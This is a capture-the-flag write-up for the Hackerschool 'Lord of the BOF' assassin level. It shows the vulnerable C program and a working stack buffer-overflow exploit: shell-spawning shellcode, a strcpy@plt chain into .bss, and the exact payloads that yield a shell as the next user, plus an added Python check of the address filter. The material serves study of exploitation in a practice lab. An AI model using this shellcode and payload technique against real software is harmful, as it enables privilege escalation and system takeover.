
System Hacking / Hackerschool LOB

Hackerschool LOB (giant -> assassin) by ORANG

LOB_giant



[giant@localhost giant]$ bash2

[giant@localhost giant]$ ls

assassin  assassin.c

[giant@localhost giant]$ cat assassin.c

/*
        The Lord of the BOF : The Fellowship of the BOF
        - assassin
        - no stack, no RTL
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* for strcpy and memset (missing in the original source) */

int main(int argc, char *argv[])
{
        char buffer[40];

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        /* reject a return address whose top byte points into the stack (0xbfxxxxxx) */
        if(argv[1][47] == '\xbf')
        {
                printf("stack retbayed you!\n");
                exit(0);
        }

        /* reject a return address whose top byte points into libc (0x40xxxxxx) */
        if(argv[1][47] == '\x40')
        {
                printf("library retbayed you, too!!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer+sfp hunter
        memset(buffer, 0, 44);
        return 0;
}



Start bash2 and look at the hint: this time it is "no stack, no RTL".

The program also zeroes out buffer and the sfp before returning.

The plan: put the shellcode in an environment variable, use strcpy@plt to copy the shellcode into .bss, and then return to the .bss address.

So the payload layout is dummy(44) + strcpy + bss + bss + &shellcode, heh.



[giant@localhost tmp]$ objdump -h ./assassin | grep bss
 20 .bss          00000018  080496a0  080496a0  000006a0  2**2


Address of .bss



 0x80483a8 <strcpy>

Address of strcpy@plt
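As an added example (not part of the original writeup), here is a small Python script that parses `objdump -h` output of the kind shown above, reproduces the two single-byte checks from assassin.c on a candidate return address, and shows why those checks stop a stack or libc address but let anything inside the binary's own image through. Only the .bss line of the section table comes from the page; the other section line and the sample addresses are constructed for illustration.

```python
import re
import struct

# Constructed sample of `objdump -h` output. The .bss line is the one
# quoted on the page; the .data line is a typical line added for illustration.
OBJDUMP_H = """\
./assassin:     file format elf32-i386

Sections:
Idx Name          Size      VMA       LMA       File off  Algn
 18 .data         00000010  08049680  08049680  00000680  2**2
 20 .bss          00000018  080496a0  080496a0  000006a0  2**2
"""

# Idx, Name, Size, VMA, LMA, File off (all hex fields are 8 digits on 32-bit ELF)
SECTION_RE = re.compile(
    r"^\s*(\d+)\s+(\S+)\s+([0-9a-f]{8})\s+([0-9a-f]{8})\s+([0-9a-f]{8})\s+([0-9a-f]{8})"
)


def parse_sections(text):
    """Return {section name: (vma, size)} from `objdump -h` output."""
    sections = {}
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            name = m.group(2)
            size = int(m.group(3), 16)
            vma = int(m.group(4), 16)
            sections[name] = (vma, size)
    return sections


BUFFER_SIZE = 40          # char buffer[40] in assassin.c
SAVED_EBP = 4             # the sfp sitting right above the buffer
RET_OFFSET = BUFFER_SIZE + SAVED_EBP   # 44: where the saved return address begins


def checked_index():
    """assassin.c inspects argv[1][47]. On little-endian x86 the 4-byte
    return address occupies offsets 44..47, so index 47 is its most
    significant byte, which is what the two checks look at."""
    return RET_OFFSET + 3


def filter_verdict(ret_addr):
    """Apply the same two checks as assassin.c to a candidate return address.
    Returns (accepted, message)."""
    msb = struct.pack("<I", ret_addr)[3]   # byte 47 of the argument
    if msb == 0xBF:
        return False, "stack retbayed you!"
    if msb == 0x40:
        return False, "library retbayed you, too!!"
    return True, "accepted"


def in_section(sections, addr):
    """Name of the section whose [vma, vma+size) range contains addr, or None."""
    for name, (vma, size) in sections.items():
        if vma <= addr < vma + size:
            return name
    return None


if __name__ == "__main__":
    secs = parse_sections(OBJDUMP_H)
    bss_vma, bss_size = secs[".bss"]
    print("checked byte index:", checked_index())
    print(".bss at 0x%08x, size 0x%x" % (bss_vma, bss_size))
    for candidate in (0xBFFFFE1B, 0x40012345, bss_vma, 0x080496C0):
        ok, msg = filter_verdict(candidate)
        print("0x%08x -> %s (%s)" % (candidate, msg, in_section(secs, candidate)))
```

Two things worth noticing from the output: every address whose top byte is 0x08 is accepted, so a one-byte check on the return address cannot tell the binary's writable segments apart from anything else; and the section table lists .bss as 0x18 bytes starting at 0x080496a0, so the 0x080496c0 used in the payload further down is 8 bytes past the listed end of .bss (still in the same writable page, which is why it works). The actual fix for this class of bug is a bounded copy into `buffer`, not filtering bytes of the return address.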


[giant@localhost tmp]$ export ORANG=`perl -e 'print "\x90"x20, "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

[giant@localhost tmp]$ echo $ORANG

11̀É1F̀1Ph//shh/binPS°

[giant@localhost tmp]$ ./getenv

0xbffffe1f


(gdb) x/40s 0xbffffe1f - 400
...omitted...
0xbffffca1:  "ORANG=", '\220' <repeats 20 times>, "11\200\211\2111F\2001Ph//shh/bin\211PS\211\211°\013\200"

(gdb) x/s 0xbffffca7
0xbffffca7:  '\220' <repeats 20 times>, "11\200\211\2111F\2001Ph//shh/bin\211PS\211\211°\013\200"


The shellcode is located at 0xbffffca7.


[giant@localhost tmp]$ ./assassin `perl -e 'print "A"x44, "\xa8\x83\x04\x08", "\xc0\x96\x04\x08","\xc0\x96\x04\x08","\xa7\xfc\xff\xbf"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Segmentation fault (core dumped)


The attack failed because of an address discrepancy. Analyzing the core dump:


(gdb) x/x 0xbffffe1b

0xbffffe1b: 0x90909090


So the exact location of the shellcode is 0xbffffe1b. Trying the attack again:



[giant@localhost giant]$ ./assassin `perl -e 'print "A"x44, "\xa8\x83\x04\x08", "\xc0\x96\x04\x08","\xc0\x96\x04\x08","\x1b\xfe\xff\xbf"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

bash$ id

uid=515(assassin) gid=514(giant) egid=515(assassin) groups=514(giant)

bash$ my-pass

euid = 515

pushing me away 



Success!!